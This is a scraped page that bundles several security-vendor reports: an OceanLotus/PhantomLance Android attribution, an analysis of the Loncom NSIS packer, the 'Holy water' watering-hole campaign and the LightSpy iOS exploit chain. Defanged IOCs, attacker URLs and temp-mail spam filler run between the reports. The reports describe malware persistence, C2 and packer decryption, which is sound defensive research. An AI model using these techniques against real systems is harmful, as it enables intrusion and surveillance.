In May 2019, Antiy Labs published a report in which they described an Android malware campaign, claiming that it was related to OceanLotus APT. We checked the provided indicators using information from our telemetry and found that the very first tracks of these samples date back to December 2014.

It is important to note that according to our detection statistics, the majority of users affected by this campaign were located in Vietnam, with the exception of a small number of individuals located in China.

The main infection vector seems to be links to malicious applications hosted on third-party websites, possibly distributed via SMS or email spearphishing attacks. Examples below.

Referring URL for victim Malware URL First request Last request
hxxp://download.com[.]vn/android/download/nhaccuatui-downloader/31798 hxxp://113.171.224.175/videoplayer/NhacCuaTuiDownloader[.]apk 2015-03-03 2015-03-22
hxxp://nhaccuatui.android.zyngacdn.com/NhacCuaTuiDownloader[.]apk 2014-12-29 2015-03-19
hxxp://www.mediafire.com/file/1elber8zl34tag4/framaroot-xpro[.]apk hxxp://download1825.mediafire.com/tyxddh46orzg/1elber8zl34tag4/framaroot-xpro[.]apk 2015-04-07 2017-01-04

 

The latest registered malware download event occurred in December 2017. We observed a small amount of activity in 2018, but judging by the volume of hosted malware and the number of detections we observed, the main campaign took place from late 2014 to 2017.

To best visualize the similarities we discovered, we made a code structure comparison of the sample from the old reported OceanLotus Android campaign (MD5: 0e7c2adda3bc65242a365ef72b91f3a8) and the only unobfuscated (probably a developer version) PhantomLance payload v3 (MD5: 243e2c6433815f2ecc204ada4821e7d6).

Code structure comparison of a sample linked to OceanLotus and PhantomLance payload v3.

 Despite the multiple differences, we observed a similar pattern used in malware implementation. It seems that the developers have renamed “module” to “plugin”, but the meaning remains the same. Overlapping classes look quite similar and have the same functionality. For example, here is a comparison of the methods contained in the Parser classes.

Parser from 0e7c2adda3bc65242a365ef72b91f3a8 ParserWriter/Reader from 243e2c6433815f2ecc204ada4821e7d6
public void appendBoolean(boolean f) public void appendBoolean(boolean value)
public void appendByte(byte data) public void appendByte(byte value)
public void appendBytes(byte[] data) public void appendBytes(byte[] value)
public void appendDouble(double val) public void appendDouble(double value)
public void appendInt(int val) public void appendInt(int value)
public void appendLong(long val) public void appendLong(long value)
private void appendNumber(Object value)
public void appendShort(short val) public void appendShort(short value)
public void appendString(String str) public void appendString(String value)
 public byte[] getContents() public byte[] getContents()
public void appendFloat(float val)
public boolean getBoolean() public boolean getBoolean()
public byte getByte() public byte getByte()
public byte[] getBytes() public byte[] getBytes()
public double getDouble() public double getDouble()
public float getFloat()
public int getInt() public int getInt()
public long getLong() public long getLong()
public short getShort() public short getShort()
byte getSignal()
public String getString() public String getString()
getStringOfNumber()

Using our malware attribution technology, we can see that the PhantomLance payloads are at least 20% similar to the ones from the old OceanLotus Android campaign.

OceanLotus macOS backdoors

There are multiple public reports of macOS backdoors linked by the industry to OceanLotus. We examined these in order to find possible overlaps, with the caveat that it was really difficult to compare malware implemented for two completely different platforms, since two different programming languages were obviously used for the implementation process. However, during the analysis of the macOS payload (MD5: 306d3ed0a7c899b5ef9d0e3c91f05193) dated early 2018, we were able to catch a few minor tracks of the code pattern used in the Android malware implementation described above. In particular, three out of seven main classes had the same names and similar functionality: “Converter”, “Packet” and “Parser”.

Summary of overlaps

Another notable attribution token that applies to most of OceanLotus malware across platforms is usage of three redundant, different C2 servers by each sample, mostly subdomains. Below is an example of this from the samples examined above and OceanLotus Windows malware described in our private report.

MD5 C2 servers Description
0d5c03da348dce513bf575545493f3e3 mine.remaariegarcia[.]com

egg.stralisemariegar[.]com

api.anaehler[.]com

PhantomLance Android
d1eb52ef6c2445c848157beaba54044f sadma.knrowz[.]com

ckoen.dmkatti[.]com

itpk.mostmkru[.]com

OceanLotus Android campaign 2014-2017
306d3ed0a7c899b5ef9d0e3c91f05193 ssl.arkouthrie[.]com

s3.hiahornber[.]com

widget.shoreoa[.]com

OceanLotus MacOS backdoor
51f9a7d4263b3a565dec7083ca00340f ps.andreagahuvrauvin[.]com

paste.christienollmache[.]xyz

att.illagedrivestralia[.]xyz

OceanLotus Windows backdoor

Based on the complete analysis of previous campaigns, with the actors’ interests in victims located in Vietnam, infrastructure overlaps between PhantomLance and OceanLotus for Windows, multiple code similarities between an old Android campaign and MacOS backdoors, we attribute the set of the Android activity (campaign 2014-2017 and PhantomLance) to OceanLotus with medium confidence.

Considering the timeline of the Android campaigns, we believe that the activity reported by Antiy Labs is a previous campaign that was conducted by OceanLotus until 2017, and PhantomLance is a successor, active since 2016.

In summarizing the results of this research, we are able to assess the scope and evolution of the actors’ Android set of activity, operating for almost six years.

IOC

Kaspersky Lab products verdicts

PhantomLance

HEUR:Backdoor.AndroidOS.PhantomLance.*
HEUR:Trojan-Dropper.AndroidOS.Dnolder.*

Android campaign linked to OceanLotus (2014-2017)

HEUR:Trojan.AndroidOS.Agent.eu
HEUR:Trojan.AndroidOS.Agent.vg
HEUR:Trojan-Downloader.AndroidOS.Agent.gv

macOS campaign linked to OceanLotus

HEUR:Backdoor.OSX.OceanLotus.*

MD5

PhantomLance malware

2e06bbc26611305b28b40349a600f95c
b1990e19efaf88206f7bffe9df0d9419
7048d56d923e049ca7f3d97fb5ba9812
e648a2cc826707aec33208408b882e31
3285ae59877c6241200f784b62531694
8d5c64fdaae76bb74831c0543a7865c3
6bf9b834d841b13348851f2dc033773e
0d5c03da348dce513bf575545493f3e3
0e7c2adda3bc65242a365ef72b91f3a8
a795f662d10040728e916e1fd7570c1d
d23472f47833049034011cad68958b46
8b35b3956078fc28e5709c5439e4dcb0
af44bb0dd464680395230ade0d6414cd
65d399e6a77acf7e63ba771877f96f8e
79f06cb9281177a51278b2a33090c867
b107c35b4ca3e549bdf102de918749ba
83cd59e3ed1ba15f7a8cadfe9183e156
c399d93146f3d12feb32da23b75304ba
83c423c36ecda310375e8a1f4348a35e
94a3ca93f1500b5bd7fd020569e46589
54777021c34b0aed226145fde8424991
872a3dd2cd5e01633b57fa5b9ac4648d
243e2c6433815f2ecc204ada4821e7d6

PhantomLance payload-free versions

a330456d7ca25c88060dc158049f3298
a097b8d49386c8aab0bb38bbfdf315b2
7285f44fa75c3c7a27bbb4870fc0cdca
b4706f171cf98742413d642b6ae728dc
8008bedaaebc1284b1b834c5fd9a7a71
0e7b59b601a1c7ecd6f2f54b5cd8416a

Android campaign 2014-2017

0e7c2adda3bc65242a365ef72b91f3a8
50bfd62721b4f3813c2d20b59642f022
5079cb166df41233a1017d5e0150c17a
810ef71bb52ea5c3cfe58b8e003520dc
c630ab7b51f0c0fa38a4a0f45c793e24
ce5bae8714ddfca9eb3bb24ee60f042d
d61c18e577cfc046a6252775da12294f
fe15c0eacdbf5a46bc9b2af9c551f86a
07e01c2fa020724887fc39e5c97eccee
2e49775599942815ab84d9de13e338b3
315f8e3da94920248676b095786e26ad
641f0cc057e2ab43f5444c5547e80976

Domains and IP addresses

PhantomLance

mine.remaariegarcia[.]com
egg.stralisemariegar[.]com
api.anaehler[.]com
cloud.anofrio[.]com
video.viodger[.]com
term.ursulapaulet[.]com
inc.graceneufville[.]com
log.osloger[.]biz
file.log4jv[.]info
news.sqllitlever[.]info
us.jaxonsorensen[.]club
staff.kristianfiedler[.]club
bit.catalinabonami[.]com
hr.halettebiermann[.]com
cyn.ettebiermahalet[.]com

Android campaign 2014-2017

mtk.baimind[.]com
ming.chujong[.]com
mokkha.goongnam[.]com
ckoen.dmkatti[.]com
sadma.knrowz[.]com
itpk.mostmkru[.]com
aki.viperse[.]com
game2015[.]net
taiphanmemfacebookmoi[.]info
nhaccuatui.android.zyngacdn[.]com
quam.viperse[.]com
jang.goongnam[.]com


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Loncom packer: from backdoors to Cobalt Strike – 10 minute mail

The previous story described an unusual way of distributing malware under disguise of an update for an expired security certificate. After the story went out, we conducted a detailed analysis of the samples we had obtained, with some interesting findings. All of the malware we examined from the campaign was packed with the same packer, which we named Trojan-Dropper.NSIS.Loncom. The malware uses legitimate NSIS software for packing and loading shellcode, and Microsoft Crypto API for decrypting the final payload. Just as the earlier find, this one was not without its surprises, as one of the packaged samples contained software used by APT groups.

Primary analysis

Loncom utilizes NSIS for running shellcode contained in a file with a name that consists of numbers. In our example, the file is named 485101134:

Overview of the NSIS archive contents

Once the shellcode is unpacked to the hard disk and loaded into the memory, an NSIS script calculates the starting position and proceeds to the next stage.

What the shellcode does

Before proceeding to decrypt the payload, the shellcode starts decrypting itself piece by piece, using the following algorithm:

  • Find position for next 0xDEADBEEF dword.
  • Read dword: size of data to decrypt.
  • Read dword: first part of key.
  • Read dword: second part of key.
  • Find suitable key: check the numbers consequently, starting at 0, while xor(i, second part of key) != first part of key. This part is needed to hold up execution and prevent AV detection. After simplification, key = i = xor(first part, second part).
  • Decrypt next part of shellcode (xor), move on to it.

Decrypting the next part of the shellcode

Here’s the code that performs the algorithm described above:

After several such iterations of block decryption, the shellcode switches to active steps, loading libraries and retrieving the addresses of required functions with the help of the APIHashing technique. This helps avoid stating the names of requested functions directly, providing their hashes instead. When searching for functions by hash, a hash will be calculated for each element from the library export table until it matches the target.

Then, Loncom decrypts the payload contained in the same file as the shellcode and proceeds to run it. The payload is encrypted with an AES-256 block cipher. The decryption key is stated in the code, and the payload offset and size are passed from the NSIS script.

The main part of the shellcode: decrypting the payload

Unpacking

For automated Loncom unpacking, we need to find out how data is stored in the packed NSIS installers, obtain the payload offset and size from the NSIS script, and pull the key from the shellcode.

Unpacking the NSIS

After a brief analysis, we managed to find that the NSIS installers have the following structure:

  • an MZPE NSIS interpreter containing in its overlay the data to be processed: the flag, the signatures, the size of the unpacked header, and the total size of the data, and then the containers, i.e. the compressed data itself.
  • Containers in the following format: dword (data size):zlib_deflate(data). The 0th container has the header, the first container has our file with the shellcode and the payload, and the second one has the DLL with the NSIS plugin.
  • The header contains a table of operation codes for the NSIS interpreter, a string table and a language table.

As we have obtained the encrypted file, now all we need is to find the payload offset and size, and proceed to decrypting the payload and the shellcode.

NSIS data structure

As all arguments in the NSIS operation codes when using plugins are passed as strings, we need to retrieve from the header string table all strings that look like numbers within the logical limits: from 0 to (file size – shellcode size).
NSIS unpacking code:

To simplify determining the payload offset and size, we can recall the structure of the file with the shellcode: encrypted blocks are decrypted from the smallest address to the largest, top to bottom, and the payload is located above the shellcode. Thus, we can determine the position of the 0xDEADBEEF byte and consider it the end of the encrypted data (aligning as required, because AES is a block cipher).

Decrypting the shellcode

To decrypt the payload, we need to:

  • decrypt the shellcode blocks;
  • determine where the AES key is;
  • retrieve the key;
  • try to decrypt the payload for offsets received from the NSIS;
  • stop after obtaining the first two bytes = ‘MZ’.

Step one can be performed by slightly modifying the code that performs the decryption algorithm in IDA Pro. The key can be determined with the help of a simple regular expression: ‘xC7x45.(….)xC7x45.(….)xC7x45.(….)xC7x45.(….)xE8’ — “mov dword ptr” 4 times, then “call” (pseudocode in the main part of the shellcode).
The other steps do not require a detailed explanation. We will now describe the actual malware that was packed with Loncom.

What’s inside

Besides Mokes and Buerak, which we mentioned in the previous article, we noticed packed specimens of Backdoor.Win32.DarkVNC and Trojan-Ransom.Win32.Sodin families, also known as REvil and Sodinokibi. The first is a type of backdoor used for controlling an infected machine via the VNC protocol. The second is a ransomware that encrypts the victim’s information and threatens to publish it.
However, the most exciting find was the Cobalt Strike utility, used both by legal pentesters and by various APT groups. The command center of the sample that contained Cobalt Strike had previously been seen distributing CactusTorch, a utility for running shellcode present in Cobalt Strike modules, and the same Cobalt Strike packed with a different packer.

We continue monitoring Trojan-Dropper.NSIS.Loncom and hope to share new findings soon.

IOC

BB00BA9726F922E07CF243D3CCFC2B6E (Backdoor.Win32.DarkVNC)
EBE191BF77044961684DF51B88CA8D05 (Backdoor.Win32.DarkVNC)
4B4C98AC8F04680F7C529956CFE8519B (Trojan-Ransom.Win32.Sodin)
AEF8FBB5C64734093E78EB13E6FA7849 (Cobalt Strike)


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Holy water: ongoing targeted water-holing attack in Asia – 10 minute mail

On December 4, 2019, we discovered watering hole websites that were compromised to selectively trigger a drive-by download attack with fake Adobe Flash update warnings. This campaign has been active since at least May 2019, and targets an Asian religious and ethnic group.

The threat actor’s unsophisticated but creative toolset has been evolving a lot since the inception date, may still be in development, and leverages Sojson obfuscation, NSIS installer, Python, open-source code, GitHub distribution, Go language, as well as Google Drive-based C2 channels.

The threat actor’s operational target is not clear because, unfortunately, we haven’t been able to observe many live operations, and we couldn’t identify any overlap with known intrusion sets.

Thou shalt update plugins: attack synopsis

The watering holes have been set-up on websites that belong to personalities, public bodies, charities and organizations of the targeted group. At the time of writing, some of these websites (all hosted on the same server) are still compromised, and continue to direct selected visitors to malicious payloads:

Domain Description
*****corps.org Voluntary service program
*****ct.org Religious personality’s charity
*****policy.net Policy institute
*****che.com Religious personality
*****parliament.org Public body
*****ialwork.org Charity
*****nature.net Environmental conservation network
*****airtrade.com Fair trade organization

Upon visiting one of the watering hole websites, a previously compromised but legitimately embedded resource will load a malicious JavaScript. It’s hosted by one of the water-holed websites, and gathers information on the visitor. An external server (see Fig. 1) then ascertains whether the visitor is a target.

Fig. 1. Target validation service request.

If the visitor is validated as a target, the first JavaScript stage will load a second one, which in turn will trigger the drive-by download attack, showing a fake update pop-up (see Fig. 2).

Fig. 2. Warning generated by the second payload.

The visitor is then expected to fall into the update trap, and download a malicious installer package that will set up a backdoor.

For nothing is hidden that will not come to light: technical analysis

1st JavaScript stage

The first JavaScript stage is named (script|jquery)-css.js, and is obfuscated with the Chinese-language web service Sojson, version 4 (see Fig. 3).

Fig. 3. Sojson v4 JavaScript obfuscated one-liner.

The payload leverages the RTCPeerConnection API and ipify service to fingerprint visitors. The gathered data is sent to loginwebmailnic.dynssl[.]com through HTTP GET requests, in order to validate the visitor as a target:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

The JSON-formatted response, whose only key is “result”, can either be “t” or “f” (true or false). If the value is “f”, then nothing happens, while “t” will trigger the second JavaScript stage (see Fig. 4).

Fig. 4. First stage deobfuscated validation logic.

In a previous version of this first JavaScript script, an additional JavaScript payload was unconditionally loaded during the first stage, and proceeded with another branch of visitor validation and the second stage.

This other branch loaded scripts from root20system20macosxdriver.serveusers[.]com, and leveraged https://loginwebmailnic.dynssl[.]com/part/mac/contentmc.php URL to validate targets. The host and validation page names suggest this other branch may have been specifically targeting MacOS users, but we were unable to confirm this hypothesis.

2nd JavaScript stage

The second JavaScript stage is named (script|jquery)-file.js, and is obfuscated with Sojson version 5 (see Fig. 5).

Fig. 5. Nerve-breaking one-line obfuscation.

The payload leverages jquery.fileDownload to show a modal pop-up to the target. It offers visitors an update to Flash Player. No technical vulnerabilities are exploited: the threat actor relies on the target’s willingness to keep their system up to date. The deobfuscated JavaScript payload (see Fig. 6) reveals that the malicious update is hosted on GitHub.

Fig. 6. Malicious update source in second JavaScript payload.

GitHub FlashUpdate repository

The pop-up links to a PE executable hosted on github[.]com/AdobeFlash32/FlashUpdate. GitHub disabled this repository on February 14 after we reported it to them. However, the repository has been online for more than nine months, and thanks to GitHub’s commit history (see Fig. 7), we gained a unique insight into the attacker’s activity and tools.

Fig. 7. GitHub’s AdobeFlash32 commit history.

Four executables were hosted in AdobeFlash32/FlashUpdate on the last day it was still available:

  • An installer package, embedding a decoy legitimate Flash update and a stager.
  • Godlike12, a Go backdoor that implements a Google Drive based C2 channel.
  • Two versions of the open-source Stitch Python backdoor that the threat actor modified to add functionalities (persistence, auto-update, decoy download and execution).

Digging into the repository for older commits, we also discovered a previous fake update toolset: a C installer bundling the legitimate Flash installer and a vanilla Stitch backdoor, as well as a C++ infostealer that collects information about host computers (OS version, IP address, hostname) and sends them over HTTP/S.

Installer package

MD5 9A819F2CE060058745FF5374221ADA7C
Compilation date 2017-Jul-24 06:35:22
File type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
File size 4420 KB
File names flashplayer32ppi_xa_install.exe

This malicious update package is a NSIS installer version 3 that will drop and execute two other binaries:

  • FlashUpdate.exe, D59B35489CB88619415D175953CA5400, a legitimate Windows Flash Player installer from January 15 that is used as a decoy to trick the user into believing they actually set up a Flash update. As modern Adobe Flash installers ‘phone home’ to check for their own validity, this one will fail nowadays with a message stating that the installer is outdated or renamed, and will direct the user to the Adobe website.
  • Intelsyc.exe, the malicious payload (described below).

The installer is detected by Kaspersky endpoint protection heuristics as HEUR:Trojan.Win32.Tasker.gen.

Intelsyc Go stager

MD5 6DC5F8282DF76F4045F75FEA3277DF41
Compilation date 1970-Jan-01 00:00:00
File type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
File size 5976 KB
File names flashplayer32ppi_xa_install.exe
C2 server adobeflash31_install.ddns[.]info
User Agent Go-http-client/1.1

The Go programmed Intelsyc implant is aimed at staging itself, downloading the Godlike12 backdoor (described below), and setting up persistence.

It will first retrieve /flash/sys.txt with HTTP GET on adobeflash31_install.ddns[.]info. The file contents may be used as a killswitch to stop any further deployment. If the content is “1” though, the implant will:

  • copy itself to C:/ProgramData/Intel/Intelsyc.exe;
  • establish persistence through schtasks [T1053] with a logon task named Intelsyc, run as system, and pointing to a previously created self copy;
  • download Godlike12 from github[.]com/AdobeFlash32/FlashUpdate, as C:ProgramDataAdobeflashdriver.exe;
  • establish Godlike12 persistence through a registry run key [T1060] named flashdriver in HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun, and pointing to a previously downloaded backdoor.

The stager is detected by Kaspersky endpoint protection heuristics as UDS:DangerousObject.Multi.Generic, and may be misidentified as the GoRansom Go ransomware proof of concept by other endpoint protection products.

Source files paths in the code suggest this backdoor may have been developed on a Windows system.

Godlike12 Go backdoor

MD5 BEC4482890A89F0184B463C727709D53
Compilation date 1970-Jan-01 00:00:00
File type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
File size 4436 KB
File names flashdriver.exe
C2 server Google Drive

This implant is written in Go language, and its C2 channel relies on file exchanges with a Google Drive space, through Google Drive’s HTTPS API v3. The implant probably leverages the gdrive Go source from GitHub, as it shares several identical code source paths with it.

Godlike12 is the name the threat actor gave to the Google Drive space connections from this implant. Source file paths in the code suggest this backdoor may have been developed on a GNU/Linux system. The not-so-common (less than 100 results in a popular search engine) /root/gowork GOPATH that some of this backdoor’s modules have been compiled from seems popular in Chinese-speaking communities, and may originate from a Chinese-authored tutorial on Go language.

Godlike12 first proceeds with host fingerprinting upon startup (hostname, IP address, MAC address, Windows version, current time). The result is encrypted, base64-encoded, stored in a text file at %TEMP%/[ID]-lk.txt, and uploaded to the remote Google Drive. The implant then regularly checks for a remote [ID]-cs.txt, that contains encrypted commands to execute, and stores encrypted command results in %TEMP%/[ID]-rf.txt to later upload them to the same Google Drive space. ID is the MD5 hash of the base64-encoded MAC address of the first connected network adapter, while TripleDES in ECB mode is used as an encryption algorithm. It is worth mentioning that once again, the encryption function seems to have been inspired from existing open-source code, which mainly appears popular in Chinese-language forums.

Godlike12 does not implement a persistence mechanism, as it is provided by the previous installer package. It is detected by Kaspersky endpoint protection heuristics as HEUR:Trojan.Win32.Generic.

With this implant being a month old at the time of writing (while being in use since at least October 2019), and other malicious update implants having been used before, it is possible that Godlike12-based operations were still a work in progress when we investigated them.

Modified Stitch Python backdoor

MD5 EC993FF561CBC175953502452BFA554A
Compilation date 2008-Nov-10 09:40:35
File type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
File size 7259 KB
File names flashplayer32_xa_pp_install.exe
flashplayer32pp_xa_install.exe
C2 server system0_update04driver_roots.dynamic-dns[.]net:443

This implant is a modified version of the open-source Python backdoor called Stitch, packed as a standalone PE executable with Py2exe.

Threat actors wrapped Stitch with custom Python code to perform additional operations:

  • It downloads a legitimate Adobe Flash installation program from the C2 server at startup;
  • It auto-updates the backdoor from ubntrooters.serveuser[.]com at startup;
  • It ensures persistence through schtasks [T1053] with a logon task named AdobeUpdater pointing to C:ProgramDatapackageAdobeService.exe.

Under the hood, Stitch is a remote shell program that provides classic backdoor functionalities by establishing a direct socket connection, to exchange AES-encrypted data with the remote server.

Conclusion

With almost 10 compromised websites and dozens of implanted hosts (that we know of), the attackers have set up a sizable yet very targeted water-holing attack. The toolset that’s being used seems low-budget and not fully developed, but has been modified several times in a few months to leverage interesting features like Google Drive C2, and would be characteristic of a small, agile team.

We were unable to observe any live operations, but some tracks indicate that the Godlike12 backdoor is not widespread, and is probably used to conduct reconnaissance and data-exfiltration operations.

We were unable to correlate these attacks to any known APT groups.
For more details and the latest information on this threat actor, please contact [email protected]

Appendix – IOCs

Infrastructure

Domain IP address Description
root20system20macosxdriver.serveusers[.]com 45.32.154[.]111 Watering hole targets validator server
loginwebmailnic.dynssl[.]com 207.148.117[.]159 Watering hole targets validator server
ubntrooters.serveuser[.]com 45.76.43[.]153 Stitch auto-update server
system0_update04driver_roots.dynamic-dns[.]net 95.179.171[.]173 Stitch C2
sys_andriod20_designer.dynamic-dns[.]net 45.63.114[.]152 Stitch C2
adobeflash31_install.ddns[.]info 95.179.171[.]173 Installer package C2
airjaldinet[.]ml 108.61.178[.]125 Older C++ validator C2

URLs

https://loginwebmailnic.dynssl[.]com/part/mac/contentmc.php
https://loginwebmailnic.dynssl[.]com/all/content.php
https://loginwebmailnic.dynssl[.]com/lh/content.php
https://root20system20macosxdriver.serveusers[.]com/yW6jOyQM16rj.html
https://root20system20macosxdriver.serveusers[.]com/itV6E1uKYiOo.html
http://ubntrooters.serveuser[.]com/wuservice.exe
http://ubntrooters.serveuser[.]com/upgrade.exe
http://ubntrooters.serveuser[.]com/flashplayer_update.exe
http://adobeflash31_install.ddns[.]info/flash/sys.txt
https://github[.]com/AdobeFlash32/FlashUpdate/
https://airjaldinet[.]ml/

Hashes (MD5)

0C6025A2C68E1C702A3022F1A6AE9169
1076A0EE924F198A7BD58A2DE1F060A0
10B4D3A667E06DC4B06AA542173D052C
11294E27491B496E36CA7DB9F363ADCD
11A16E109DBAF2FD080D8490328DE5A1
2E1862BC23085402EE11C88E540533C0
3989AC9EFB6A725918BD1810765D30B3
481DD1A37C86FDA68BCED0ECB2F47597
5287045D15FF60618F426AFC03BBB331
53CB974CAF909EEDCD86D2F80E75AD0A
5F19BB1688CA836B9207248F9096B9D2
6DF39D2CE9FCA27B78CC5CA0BED89703
7EB0C103AE21189AD9AD4A9804293B22
8623FA35226AC92CF6F02447AC80AFB0
9E69DDE252038B4A38EF0BFF6CE7FCD7
AD7A4333BC364DF3D4FA00B13CBBBEB4
B02ABA86409BE2AB263B1A476C1A1417
B21AF331B1752A70360B5D8DC9013F3F
B21BD93F15916A9A4AC76350D8FDBE10
BE3E563E95DEDCA0CEC9792194FFF2AC
DE2D8AF2EFED0C145690B2F13CD063B3
EC993FF561CBC175953502452BFA554A
ED081A869D30BB90B76552C83BD784C8
BEC4482890A89F0184B463C727709D53
9A819F2CE060058745FF5374221ADA7C
6DC5F8282DF76F4045F75FEA3277DF41


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

iOS exploit chain deploys “LightSpy” feature-rich malware – 10 minute mail

A watering hole was discovered on January 10, 2020 utilizing a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The site appears to have been designed to target users in Hong Kong based on the content of the landing page. Since the initial activity, we released two private reports exhaustively detailing spread, exploits, infrastructure and LightSpy implants.

Landing page of watering hole site

We are temporarily calling this APT group “TwoSail Junk”. Currently, we have hints from known backdoor callbacks to infrastructure about clustering this campaign with previous activity. And we are working with colleagues to tie LightSpy with prior activity from a long running Chinese-speaking APT group, previously reported on as Spring Dragon/Lotus Blossom/Billbug(Thrip), known for their Lotus Elise and Evora backdoor malware. Considering this LightSpy activity has been disclosed publicly by our colleagues from TrendMicro, we would like to further contribute missing information to the story without duplicating content. And, in our quest to secure technologies for a better future, we reported the malware and activity to Apple and other relevant companies.

This supplemental information can be difficult to organize to make for easy reading. In light of this, this document is broken down into several sections.

  1. Deployment timeline – additional information clarifying LightSpy deployment milestone events, including both exploit releases and individual LightSpy iOS implant component updates.
  2. Spreading – supplemental technical details on various techniques used to deliver malicious links to targets
  3. Infrastructure – supplemental description of a TwoSail Junk RDP server, the LightSpy admin panel, and some related server-side javascript
  4. Android implant and a pivot into evora – additional information on an Android implant and related infrastructure. After pivoting from the infrastructure in the previous section, we find related implants and backdoor malware, helping to connect this activity to previously known SpringDragon APT with low confidence.

More information about LightSpy is available to customers of Kaspersky Intelligence Reporting. Contact: [email protected]

Deployment timeline

During our investigation, we observed the actor modifying some components involved in the exploit chain on February 7, 2020 with major changes, and on March 5, 2020 with minor ones.

Figure 1. Brief LightSpy event timeline

The first observed version of the WebKit exploit dated January 10, 2020 closely resembled a proof of concept (PoC), containing elements such as buttons, alert messages, and many log statements throughout. The second version commented out or removed many of the log statements, changed alert() to print() statements, and also introduced some language errors such as “your device is not support…” and “stab not find…”.

By analyzing the changes in the first stage WebKit exploit, we discovered the list of supported devices was also significantly extended:
Table 1. iOS version exploit support expansion

Device iOS version Supported as of Jan 10 Supported as of Feb 7
iPhone 6 11.03 +
iPhone 6S 12.01 + commented
12.2 +
iPhone 7 12.1 +
12.11 + +
12.12 + +
12.14 +
12.2 +
iPhone 7+ 12.2 +
iPhone 8 12.2 +
iPhone 8+ 12.2 +
iPhone X 12.2 +

As seen above, the actor was actively changing implant components, which is why we are providing a full list of historical hashes in the IoC section at the end of this report. There were many minor changes that did not directly affect the functionality of each component, but there were also some exceptions to this that will be expanded on below. Based on our observations of these changes over a relatively short time frame, we can assess that the actor implemented a fairly agile development process, with time seemingly more important than stealthiness or quality.

One interesting observation involved the “EnvironmentalRecording” plugin (MD5: ae439a31b8c5487840f9ad530c5db391), which was a dynamically linked shared library responsible for recording surrounding audio and phone calls. On February 7, 2020, we noticed a new binary (MD5: f70d6b3b44d855c2fb7c662c5334d1d5) with the same name with no similarities to the earlier one. This new file did not contain any environment paths, version stamps, or any other traces from the parent plugin pattern. Its sole purpose was to clean up the implant components by erasing all files located in “/var/iolight/”, “/bin/light/”, and “/bin/irc_loader/”. We’re currently unsure whether the actor intended to replace the original plugin with an uninstall package or if this was a result of carelessness or confusion from the rapid development process.

Another example of a possible mistake involved the “Screenaaa” plugin. The first version (MD5: 35fd8a6eac382bfc95071d56d4086945) that was deployed on January 10, 2020 did what we expected: It was a small plugin designed to capture a screenshot, create a directory, and save the capture file in JPEG format. However, the plugin (MD5: 7b69a20920d3b0e6f0bffeefdce7aa6c) with the same name that was packaged on February 7 had a completely different functionality. This binary was actually a LAN scanner based on MMLanScan, an open source project for iOS that helps scan a network to show available devices along with their MAC addresses, hostname, and manufacturer. Most likely, this plugin was mistakenly bundled up in the February 7 payload with the same name as the screenshot plugin.

Figure 2. LightSpy iOS implant component layout and communications

Spreading

We cannot say definitively that we have visibility into all of their spreading mechanisms. We do know that in past campaigns, precise targeting of individuals was performed over various social network platforms with direct messaging. And, both ours and previous reporting from others have documented TwoSail Junk’s less precise and broad use of forum posts and replies. These forum posts direct individuals frequenting these sites to pages hosting iframes served from their exploit servers. We add Telegram channels and instagram posts to the list of communication channels abused by these attackers.

These sites and communication medium are known to be frequented by some activist groups.

Figure 3. LightSpy iPhone infection steps

The initial watering hole site (hxxps://appledaily.googlephoto[.]vip/news[.]html) on January 10, 2020 was designed to mimic a well known Hong Kong based newspaper “Apple Daily” by copy-pasting HTML content from the original:

Figure 4. Source of html page mimicking newspaper “Apple Daily”

However, at that time, we had not observed any indications of the site being purposely distributed in the wild. Based on our KSN detection statistics, we began seeing a massive distribution campaign beginning on February 18, 2020.

Table 2. LightSpy related iframe domains, urls, and first seen timestamps

Starting on February 18, the actors began utilizing a series of invisible iframes to redirect potential victims to the exploit site as well as the intended legitimate news site from the lure.

Figure 5. Source of html page with lure and exploit

Infrastructure

RDP Clues

The domain used for the initial watering hole page (googlephoto[.]vip) was registered through GoDaddy on September 24, 2019. No unmasked registration information was able to be obtained for this domain. The subdomain (appledaily.googlephoto[.]vip) began resolving to a non-parked IP address (103.19.9[.]185) on January 10, 2020 and has not moved since. The server is located in Singapore and is hosted by Beyotta Network, LLP.

At the time of our initial investigation, the server was listening on ports 80 (HTTP) and 3389 (RDP with SSL/TLS enabled). The certificate for the server was self-signed and created on December 16, 2019. Based on Shodan data as early as December 21, 2019, there was a currently logged in user detected who’s name was “SeinandColt”.

Figure 6. Screenshot of RDP login page for the server 103.19.9[.]185

Admin Panel

The C2 server for the iOS payload (45.134.1[.]180) also appeared to have an admin panel on TCP port 50001.

The admin panel seems to be a Vue.js application bundled with Webpack. It contains two language packs: English and Chinese. A cursory analysis provides us the impression of actual scale of the framework:

If we take a closer look at the index.js file for the panel, some interesting configurations are visible, to include a user config, an application list, log list, and other interesting settings.

The “userConfig” variable indicates other possible platforms that may have been targeted by the same actors, such as linux, windows, and routers.

Another interesting setting includes the “app_list” variable which is commented out. This lists two common applications used for streaming and chat mostly in China (QQ and Miapoi). Looking further, we can also see that the default map coordinates in the config point directly to the Tian’anmen Gate in Beijing, however, most likely this is just a common and symbolic mapping application default for the center of Beijing.

Android implants and a pivot into “evora”

During analysis of the infrastructure related to iOS implant distribution we also found a link directing to Android malware – hxxp://app.hkrevolution[.]club/HKcalander[.]apk (MD5: 77ebb4207835c4f5c4d5dfe8ac4c764d).

